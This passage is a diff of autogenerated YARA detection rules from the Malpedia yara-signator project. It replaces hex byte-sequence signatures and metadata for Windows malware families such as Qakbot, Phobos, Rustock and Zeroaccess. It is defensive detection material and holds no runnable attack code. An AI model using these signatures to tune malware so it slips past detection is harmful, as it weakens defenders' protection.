+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roadsweep_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "e79bcb054b07fb9e07c55e5ca091a76d8b3025c95f8242bfc1e649f657a93d3b"
+		logic_hash = "10ecfffb9395be461cfda7fab93323fb263ae9a44a4ace806928ac7c12ed7628"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93547,32 +93802,32 @@ rule MALPEDIA_Win_Bitsran_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d89140c4200 5a 668b31 668930 83c102 83c002 }
-		$sequence_1 = { c686c800000043 c6864b01000043 c74668e0074200 6a0d e8???????? 59 }
-		$sequence_2 = { 53 8d85f4fdffff 50 8db744020000 }
-		$sequence_3 = { 395910 7cac 8b7514 8d95bcf9ffff 52 53 }
-		$sequence_4 = { 85c0 0f8584000000 6806020000 50 8d8deafaffff 51 668985e8faffff }
-		$sequence_5 = { 57 8d45ec 50 8d8decfbffff }
-		$sequence_6 = { c745fc99ffffff 83ceff 8b0b 8d45a8 50 51 e8???????? }
-		$sequence_7 = { 68???????? 50 898df8feffff 8995fcfeffff e8???????? 8bf0 }
-		$sequence_8 = { 68???????? 8d8decf3ffff 68???????? 51 }
-		$sequence_9 = { 3b7804 0f8daa050000 837e04ff 7409 }
+		$sequence_0 = { c1f902 0fb691b0914000 88141e 8b18 46 }
+		$sequence_1 = { 8944240c 8b4514 89442404 ff521c 8b75c8 31c9 }
+		$sequence_2 = { 85c0 740c 31c0 8b5df8 8b75fc 89ec 5d }
+		$sequence_3 = { 7403 83cb01 84c9 7409 8b4d18 8b39 01f8 }
+		$sequence_4 = { 5b 5e 5f 5d c3 85c0 750d }
+		$sequence_5 = { 89e5 fc 83ec08 b90e000000 891c24 8b5d08 897c2404 }
+		$sequence_6 = { 8b9540ffffff 891424 e8???????? c745a001000000 e8???????? 83c518 837da001 }
+		$sequence_7 = { c744240400000000 83ee64 891c24 e8???????? }
+		$sequence_8 = { c68565fdffff23 c68566fdffff5b c68567fdffff55 c68568fdffff7f c68569fdffff36 c6856afdffff7e c6856bfdffff76 }
+		$sequence_9 = { 89542408 891c24 e8???????? 893424 e8???????? 8b4510 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 160768
 }
-rule MALPEDIA_Win_Rustock_Auto : FILE
+rule MALPEDIA_Win_Shimrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ee0956c-f0f1-5810-b10e-703861aef3b0"
+		id = "55457a06-1988-5269-89a3-7d42c80efbb3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rustock_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shimrat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3641dcae675b230edb174a50f5ec564e4adb4fc1e74afa68371b58ccaf9cdb5a"
+		logic_hash = "9a44a689bc8afe661c9129a62baf593cebe3f41d9c0399451d80b6ae3b28e636"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93586,32 +93841,32 @@ rule MALPEDIA_Win_Rustock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 8d85f8fdffff 50 ff15???????? 6a01 8d85fcfeffff 50 }
-		$sequence_1 = { 8901 eb03 8b5dbc 837de000 }
-		$sequence_2 = { 897de4 eb10 837ddcff 740a }
-		$sequence_3 = { 29f8 83cbff f7d3 b8670e0100 8d0dc8680100 01d0 }
-		$sequence_4 = { 83c404 8b1c24 83c404 5e }
-		$sequence_5 = { 7404 33c0 40 c3 33c0 c3 6a34 }
-		$sequence_6 = { 85c9 7506 68db030100 c3 ff15???????? }
-		$sequence_7 = { 770d 57 e8???????? 8bd0 85d2 59 }
-		$sequence_8 = { 80a04031040100 40 3bc6 72be 5e }
-		$sequence_9 = { 8975c0 85f6 0f848b000000 8365fc00 83c003 83e0fc e8???????? }
+		$sequence_0 = { 50 8bce e8???????? 85c0 742b 837dfc04 7518 }
+		$sequence_1 = { 85c0 7409 ff7570 e8???????? }
+		$sequence_2 = { 5e c3 33c0 8901 894104 894108 c3 }
+		$sequence_3 = { 0f8416010000 8d8e90000000 e8???????? 50 8d8e90000000 }
+		$sequence_4 = { 85c0 75ca 8b07 881c06 8b4514 }
+		$sequence_5 = { 50 e8???????? 83c414 50 8d4f6c e8???????? }
+		$sequence_6 = { 8b35???????? 83c40c 395dd8 7405 ff75d8 }
+		$sequence_7 = { 0f84a4000000 6a7f 8d45d8 50 ff7560 }
+		$sequence_8 = { e8???????? 85c0 0f8488000000 8d4d34 }
+		$sequence_9 = { ff7560 ffd6 e9???????? 53 ebd0 8d4d28 e8???????? }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Blindingcan_Auto : FILE
+rule MALPEDIA_Win_Yorekey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "465029b5-763a-56ed-b1de-dd91c2f1a7ca"
+		id = "eff8b001-6508-5d1e-8689-b1f2eb9999f7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blindingcan_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yorekey_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "74166ac02345e359092c0de07b6503277e6c28815f8b4319943798385b40290d"
+		logic_hash = "abba0a97f92aee372a13d852ed7f2662d19cb8080c2f20b48056340c1204a7ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93625,38 +93880,37 @@ rule MALPEDIA_Win_Blindingcan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7459c52b86f28 c745a0b5c9a315 c745a453e8ba52 c745a8b67dbc8f }
-		$sequence_1 = { c745c091810345 c745c401761a06 c745c859c24b75 c745ccec723768 c745d01a51c3d9 c745d46744180d }
-		$sequence_2 = { c745f0a70d9fae c745f48f2aedf1 c745f8fee389dd e8???????? }
-		$sequence_3 = { 8bca 8db5fcfeffff 8dbdfcfdffff f3a5 68b80b0000 8bfa }
-		$sequence_4 = { c78560fdffffdd2edf9c c78564fdffffbaced582 c78568fdffff9ffa2924 c7856cfdfffff0888168 c78570fdffff48b96edc }
-		$sequence_5 = { c785d8feffffcbdb9298 c785dcfeffff85b369f5 c785e0feffffe981ae61 c785e4feffff2f30fbf4 c785e8feffff3d4fab62 c785ecfeffff9c1c9a02 }
-		$sequence_6 = { c78558fdffff850d28e7 c7855cfdffffd50f3950 c78560fdffffdd2edf9c c78564fdffffbaced582 }
-		$sequence_7 = { 8bc1 99 f7fb 888c0dfcfeffff }
-		$sequence_8 = { f7fe 8bca e8???????? 85c0 7409 e8???????? }
-		$sequence_9 = { 48895c2408 4889742410 57 4883ec20 488d057e910100 488bda 488bf9 }
-		$sequence_10 = { f644245010 0f849f000000 488b442438 488b4c2430 48ff00 ff15???????? 488d4c247c }
-		$sequence_11 = { 744b 48391d???????? 7442 ff15???????? 85c0 7438 488b0d???????? }
-		$sequence_12 = { 7403 c60701 ffc3 4983c404 4883c608 48ffc7 83fb1a }
-		$sequence_13 = { ba00020000 488bd9 c745e745f0c989 c745eb66772976 c745ef70a9e4c4 c745f3d39c157b c745f7c10df5f5 }
-		$sequence_14 = { ff15???????? 4885c0 7434 33d2 488bc8 ff15???????? 85c0 }
-		$sequence_15 = { 8d7c001e 428d0427 3d00000100 7e6c 488b15???????? b918200000 4533c9 }
+		$sequence_0 = { 750a 85c0 7506 ff15???????? }
+		$sequence_1 = { 498bd7 488bcd e8???????? 85c0 0f85d9000000 488d1558fd0000 }
+		$sequence_2 = { 75f5 2bc2 8b15???????? d1f8 6a00 8d3400 }
+		$sequence_3 = { e8???????? 68???????? 8d45f4 50 c745f4e4d14000 e8???????? }
+		$sequence_4 = { eb1a 488d0d7d1e0100 e8???????? cc 488d0d701e0100 }
+		$sequence_5 = { 7626 83f910 7305 b8???????? 53 bb???????? 2bd8 }
+		$sequence_6 = { 42888401a0a40100 ffc7 ebde 488b0d???????? 83c8ff f00fc101 }
+		$sequence_7 = { 7420 48837daf10 727b 488b4d97 e8???????? b9c0270900 ff15???????? }
+		$sequence_8 = { 0f1f00 0fb74c05c8 488d4002 6642898c003ec10100 6685c9 75e9 b801000000 }
+		$sequence_9 = { c3 48895c2408 57 4883ec20 488d1d0f120100 488d3d08120100 eb0e }
+		$sequence_10 = { 3b04cd60184100 7413 41 83f92d 72f1 }
+		$sequence_11 = { 56 2bc1 50 8b8568ffffff 53 50 }
+		$sequence_12 = { 83f83c 762a 56 e8???????? 8d0445cc1e4100 8bc8 }
+		$sequence_13 = { 6bc930 8975e0 8db130154100 8975e4 eb2b 8a4601 84c0 }
+		$sequence_14 = { eb04 4883c014 8938 e8???????? 488d1d73190100 }
 
 	condition:
-		7 of them and filesize < 363520
+		7 of them and filesize < 274432
 }
-rule MALPEDIA_Win_Unidentified_096_Auto : FILE
+rule MALPEDIA_Win_Webc2_Head_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ffd5cfa4-f468-5327-a209-b875a1aa7db9"
+		id = "b0489fed-bd6b-5cdc-bfab-bd5427505aa6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_096_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_head_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d9d15c86fa946b0e45aa738b5898be2be607aa89def00775e64a1c8735fb15f8"
+		logic_hash = "0f0d261fc67cb4837b13f2fc98dacb6b1c0e0f0d77dda88fbe5b4ef793a0acb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93670,32 +93924,32 @@ rule MALPEDIA_Win_Unidentified_096_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb17 b028 a2???????? eb0e }
-		$sequence_1 = { b040 a2???????? eb4d b023 a2???????? eb44 b024 }
-		$sequence_2 = { 48 83e01e 83c060 eb15 85ff }
-		$sequence_3 = { eb5f b021 a2???????? eb56 }
-		$sequence_4 = { 0f9dc0 48 83e032 83c02d }
-		$sequence_5 = { 895108 8b400c 89410c e8???????? 83c410 }
-		$sequence_6 = { 8bf8 8b442420 83c408 3dff000000 741d 8b4c2420 8b54241c }
-		$sequence_7 = { 83f926 5b 0f8750010000 33d2 8a9154174000 ff24952c174000 }
-		$sequence_8 = { 5d 83c44c c21000 55 }
-		$sequence_9 = { f644240c01 7409 8ac1 2c30 a2???????? 6683f96a 723b }
+		$sequence_0 = { 83e61f 8d3c8d40cb4000 c1e603 8b0f 833c31ff 7536 833d????????01 }
+		$sequence_1 = { e8???????? 83c410 8d4c2418 8d942444080000 03f0 }
+		$sequence_2 = { 894c2424 896c241c 7e1a 8b742420 8bd1 8d7c241c }
+		$sequence_3 = { 8d8decfaffff 668b11 f6c201 7416 8088????????10 8a9405ecfdffff 8890e0b84000 }
+		$sequence_4 = { d04040 00fc 40 40 0020 }
+		$sequence_5 = { 6800040000 68???????? f3ab 55 c744242c00000000 }
+		$sequence_6 = { 89542420 33d2 895c2410 bb???????? 85c0 0f8e20010000 b910000000 }
+		$sequence_7 = { 2bca 33ed 85c9 894c2424 896c241c 7e1a }
+		$sequence_8 = { 8b7d0c 8d0594b84000 83780800 7543 }
+		$sequence_9 = { 6a1f 55 ff15???????? 8b3d???????? 6a04 81cf00330000 }
 
 	condition:
-		7 of them and filesize < 25648
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Montysthree_Auto : FILE
+rule MALPEDIA_Win_Ratankba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0d03b577-0149-576c-bee9-a21123040e4f"
+		id = "5b767439-8a52-5082-a849-b72a22dc7deb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.montysthree_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratankba_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "bf3d99d0efe6d2be58b918ad67e35573b0208282c240cbcabb922d766da8ba39"
+		logic_hash = "28a3493a9c6143ba99ec99eb8912043c44e1319e93a131fe32deda9f1f93952d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93709,32 +93963,32 @@ rule MALPEDIA_Win_Montysthree_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4d94 e8???????? 8d4df8 e8???????? }
-		$sequence_1 = { 85c0 7426 ff7608 ff450c 43 ffd7 }
-		$sequence_2 = { 7407 50 e8???????? 59 8b7c240c 8b4708 }
-		$sequence_3 = { ff15???????? 8945d8 3bc6 0f8482000000 8d8300080000 8945d4 56 }
-		$sequence_4 = { e8???????? 50 e8???????? 8bf8 3bfe 59 59 }
-		$sequence_5 = { 50 8d45bc 50 8d45ec 50 8d4dcc }
-		$sequence_6 = { 56 57 68???????? e8???????? 59 8d4da8 e8???????? }
-		$sequence_7 = { ff750c ff75fc e8???????? 035dec 017dfc }
-		$sequence_8 = { 8b35???????? ffd6 3db7000000 7441 ffd6 8bf0 }
-		$sequence_9 = { 53 57 53 6aff 53 8d4de8 }
+		$sequence_0 = { 8d1443 895108 33d2 3911 7637 }
+		$sequence_1 = { 8b4de4 891cc1 46 eb96 8b5710 8bc6 8955e4 }
+		$sequence_2 = { 897004 83ff09 750c 8b45f4 5f }
+		$sequence_3 = { 0f83a9000000 52 56 8d8d00ffffff }
+		$sequence_4 = { 6800000001 50 51 56 ff15???????? 85c0 750c }
+		$sequence_5 = { 8b1d???????? 3bfe 7413 8b4df0 8b55ec 51 }
+		$sequence_6 = { 3bce 7f13 7c05 83f820 730c }
+		$sequence_7 = { e8???????? 8b86dc000000 3bc3 7409 50 e8???????? 83c404 }
+		$sequence_8 = { 8955e4 8945f8 e8???????? 8945f4 85c0 }
+		$sequence_9 = { 899ef4000000 66898ee4000000 8d8e00010000 c645fc07 33d2 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Mistcloak_Auto : FILE
+rule MALPEDIA_Win_Saint_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd"
+		id = "92ea573f-6995-5968-986f-4f6e838a873b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mistcloak_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.saint_bot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922"
+		logic_hash = "8fc12017b3bbd916bf7702bbd87ca92c11f29e697b9a76fb35dc7516e7e5512c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93748,34 +94002,34 @@ rule MALPEDIA_Win_Mistcloak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 }
-		$sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc }
-		$sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 }
-		$sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 }
-		$sequence_4 = { 6bc618 57 8db8104e0110 57 }
-		$sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 }
-		$sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? }
-		$sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 }
-		$sequence_8 = { 8bc1 3914c5781a0110 7408 40 }
-		$sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 }
+		$sequence_0 = { 668910 8bc1 5d c20c00 55 }
+		$sequence_1 = { 668975d4 8d4508 33f6 c745b418000000 683f000f00 50 }
+		$sequence_2 = { 8d45f4 50 8d85ecefffff 50 }
+		$sequence_3 = { 83650800 8bf8 56 c745ec64000000 }
+		$sequence_4 = { c1f808 8847ff 807a013d 7402 880f 83c204 83c703 }
+		$sequence_5 = { 894dd8 894ddc ff15???????? ff75f8 e8???????? 59 03c0 }
+		$sequence_6 = { e8???????? 59 59 85c0 741f 6a00 53 }
+		$sequence_7 = { 53 8945dc e8???????? 8bd8 83c434 8b45fc 85db }
+		$sequence_8 = { 58 6a72 668945ba 58 6a49 668945bc }
+		$sequence_9 = { 59 59 85c0 7515 ff75f0 8d8544f0ffff }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 93184
 }
-rule MALPEDIA_Win_Bandit_Auto : FILE
+rule MALPEDIA_Win_Batel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "381568fe-b706-59c8-a395-3dcbe088e7b0"
+		id = "678ea513-45df-57d6-9805-5abca0dd9fcc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bandit_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.batel_auto.yar#L1-L235"
 		license_url = "N/A"
-		logic_hash = "d56d1fb9d0bb1a835a79b856616244ad303b75dee12b9e7ce8956718588a906b"
+		logic_hash = "731869ba11fac648e9df7ba8fc3d93220b79591052bdb6d5c0dfe953901a0596"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -93787,32 +94041,45 @@ rule MALPEDIA_Win_Bandit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b542448 488bb424c0000000 488bbc2480000000 4c8b842448010000 4939f8 7f1a 4c8b8c2430010000 }
-		$sequence_1 = { eb02 31d2 4889442438 48895c2428 84d2 7407 b901000000 }
-		$sequence_2 = { e9???????? 49c7417000000000 b801000000 488bac2438010000 4881c440010000 c3 31c0 }
-		$sequence_3 = { 4d89c8 4c894c2468 488d1582b94e00 e8???????? 4c8b4c2468 c78424b400000001000000 c78424a000000001000000 }
-		$sequence_4 = { 749b 440f11bc24c0000000 440f11bc24d0000000 488b9424f8000000 48899424c0000000 488bb42400010000 4889b424c8000000 }
-		$sequence_5 = { 4d8d0cf3 4d8d49d8 833d????????00 7525 4c8b4c2458 4d894cf3d8 498d34f3 }
-		$sequence_6 = { 488b6c2430 4883c438 c3 488d0555df9400 488b6c2430 4883c438 c3 }
-		$sequence_7 = { 4c89a424b8000000 488b9424b0000000 4885d2 7426 440fb66a17 4589ef 4183e51f }
-		$sequence_8 = { e8???????? 4889442440 48895c2448 48894c2450 c644242700 488b542458 488b02 }
-		$sequence_9 = { 7404 488b4008 e8???????? 90 e8???????? 8b44242c 488b6c2458 }
+		$sequence_0 = { 33c0 5b c21000 3b0d???????? }
+		$sequence_1 = { 68a00f0000 ffd5 8b1d???????? bf01000000 8d642400 68???????? }
+		$sequence_2 = { 8d642400 68???????? ff15???????? 8bf0 85f6 7422 }
+		$sequence_3 = { 33c0 40 c20c00 55 8bec 81eca0020000 68ee020000 }
+		$sequence_4 = { 68d0202300 68c4202300 e8???????? 59 59 85c0 }
+		$sequence_5 = { 750c 68c6172300 ff15???????? 59 e8???????? 833d????????ff }
+		$sequence_6 = { 6a00 50 c68560fdffff00 e8???????? 83c40c 33c9 b8???????? }
+		$sequence_7 = { 6800002300 e8???????? 83c404 85c0 7454 }
+		$sequence_8 = { 8bec ff7514 ff7510 ff750c ff7508 6862102300 6800302300 }
+		$sequence_9 = { ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 }
+		$sequence_10 = { 33c9 b8???????? 8a10 88940d60fdffff 83c003 }
+		$sequence_11 = { 55 8b2d???????? 56 57 68a00f0000 }
+		$sequence_12 = { 8bec 81eca0020000 68ee020000 ff15???????? 689d020000 8d8561fdffff 6a00 }
+		$sequence_13 = { 47 83ff5a 7ccd 5f 5e 5d }
+		$sequence_14 = { 6a01 e8???????? 59 6a00 ff15???????? 68d8202300 }
+		$sequence_15 = { 8db560fdffff f3a5 66a5 ffd0 5f }
+		$sequence_16 = { ffd0 56 ffd3 68005c2605 ffd5 }
+		$sequence_17 = { 88940d60fdffff 83c003 41 3d???????? 7cec 56 57 }
+		$sequence_18 = { 68005c2605 ffd5 47 83ff5a }
+		$sequence_19 = { 57 6a40 6800100000 689e020000 6a00 ff15???????? 8bf8 }
+		$sequence_20 = { a1???????? c704242c302300 ff35???????? a3???????? 681c302300 }
+		$sequence_21 = { 681c302300 6820302300 6818302300 ff15???????? 83c414 a3???????? 85c0 }
+		$sequence_22 = { 85c0 7412 ffd0 56 }
 
 	condition:
-		7 of them and filesize < 29914112
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Kins_Auto : FILE
+rule MALPEDIA_Win_Phobos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3620de7-0502-5d17-b47d-c76d16c08a91"
+		id = "50012a05-a115-568a-af1b-c38bab4b83db"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kins_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phobos_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f2c2bfcf5e7ce9dcb0b01d359d338a97b9128c8cf189b0c6d157b8680e4a55a3"
+		logic_hash = "c0587de91f9b07bd28460653ab9d55aeeffabbc31465d7d7ac9b9413a4a57c0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93826,125 +94093,75 @@ rule MALPEDIA_Win_Kins_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 75f8 85c0 7503 33c0 40 56 }
-		$sequence_1 = { 8bce e8???????? 85c0 0f8566ffffff 8b45f4 8b4d10 c1e005 }
-		$sequence_2 = { bf80000000 57 e8???????? 33c9 89460c 3bc1 7505 }
-		$sequence_3 = { 33c9 3b4708 8d542448 0f95c1 89742450 89742418 }
-		$sequence_4 = { 8d45f4 7503 8d45fc 33f6 }
-		$sequence_5 = { 7ced 33c0 40 c20400 }
-		$sequence_6 = { 83e37f c1e007 4e 0bc3 47 80e180 7526 }
-		$sequence_7 = { 85db 0f8532010000 8b442420 8b08 49 81e1ffffff0f 8908 }
-		$sequence_8 = { 7427 8b542418 8b450c e8???????? 84c0 7417 8b54241c }
-		$sequence_9 = { e8???????? 8d742448 e8???????? 33ff 85ff }
+		$sequence_0 = { 50 ff36 ff15???????? 8bd8 83fbff 7509 ff15???????? }
+		$sequence_1 = { 5b c9 c3 8b4620 85c0 7407 50 }
+		$sequence_2 = { 33ff 5b c6043080 3bc3 40 730e 3bc3 }
+		$sequence_3 = { ff15???????? 89442414 e8???????? 6a00 6a14 89442420 e8???????? }
+		$sequence_4 = { 68a00f0000 8d4610 50 ff15???????? }
+		$sequence_5 = { 8b450c 83c414 85c0 7408 8b0e 8b4c3908 }
+		$sequence_6 = { 59 50 8945fc e8???????? 8bf8 59 85ff }
+		$sequence_7 = { 333c9dd0b54000 8bda 23d8 333c9dd0c14000 8b5df0 337910 }
+		$sequence_8 = { 83c104 83fe08 72d6 8b0a 83e90a 0f8466010000 49 }
+		$sequence_9 = { 2bfa 53 0fb716 0fb71c37 663bd3 770a 720d }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Qakbot_Auto : FILE
+rule MALPEDIA_Win_Zeroaccess_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "420c4e6b-5192-5ecb-8603-21219ca27f7b"
+		id = "89374e4f-79aa-58be-a3f5-45921879c769"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qakbot_auto.yar#L1-L545"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeroaccess_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "3dc61bc81008dc8bd15332e5573d386c22408e9f81e4f285b87a6fbf5a5bafcc"
+		logic_hash = "b8098d3dcd80de1c46676c7e1dd2cdf56db87599f68b360b87ffc70001011948"
 		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 33c0 7402 ebfa e8???????? }
-		$sequence_1 = { 7402 ebfa 33c0 7402 }
-		$sequence_2 = { 7402 ebfa eb06 33c0 }
-		$sequence_3 = { e8???????? 33c9 85c0 0f9fc1 41 }
-		$sequence_4 = { 50 e8???????? 8b06 47 }
-		$sequence_5 = { 59 59 6afb e9???????? }
-		$sequence_6 = { 740d 8d45fc 6a00 50 e8???????? 59 }
-		$sequence_7 = { 50 8d8534f6ffff 6a00 50 }
-		$sequence_8 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? }
-		$sequence_9 = { 50 e8???????? 59 59 6afe 58 }
-		$sequence_10 = { 33c0 e9???????? 33c0 7402 }
-		$sequence_11 = { 7402 ebfa e9???????? 6a00 }
-		$sequence_12 = { 7cef eb10 c644301c00 ff465c 8b465c }
-		$sequence_13 = { e8???????? 83c410 33c0 7402 }
-		$sequence_14 = { 85c0 750a 33c0 7402 }
-		$sequence_15 = { 7507 c7466401000000 83f840 7507 }
-		$sequence_16 = { 837dfc00 750b 33c0 7402 }
-		$sequence_17 = { e8???????? e8???????? 33c0 7402 }
-		$sequence_18 = { 833d????????00 7508 33c0 7402 }
-		$sequence_19 = { c7466001000000 33c0 40 5e }
-		$sequence_20 = { 7402 ebfa 837d1000 7408 }
-		$sequence_21 = { 80ea80 8855f0 e8???????? 0fb64df7 }
-		$sequence_22 = { 7eeb 83f861 7c05 83f87a 7ee1 }
-		$sequence_23 = { 83f841 7c05 83f85a 7eeb }
-		$sequence_24 = { e8???????? 59 85c0 7505 6afe }
-		$sequence_25 = { 8d45bc 6a20 50 e8???????? 6a00 8d45bc 50 }
-		$sequence_26 = { e8???????? 833822 7505 83c8ff }
-		$sequence_27 = { b301 eb0c 813800300000 b302 7202 }
-		$sequence_28 = { 7418 813800200000 7304 b301 }
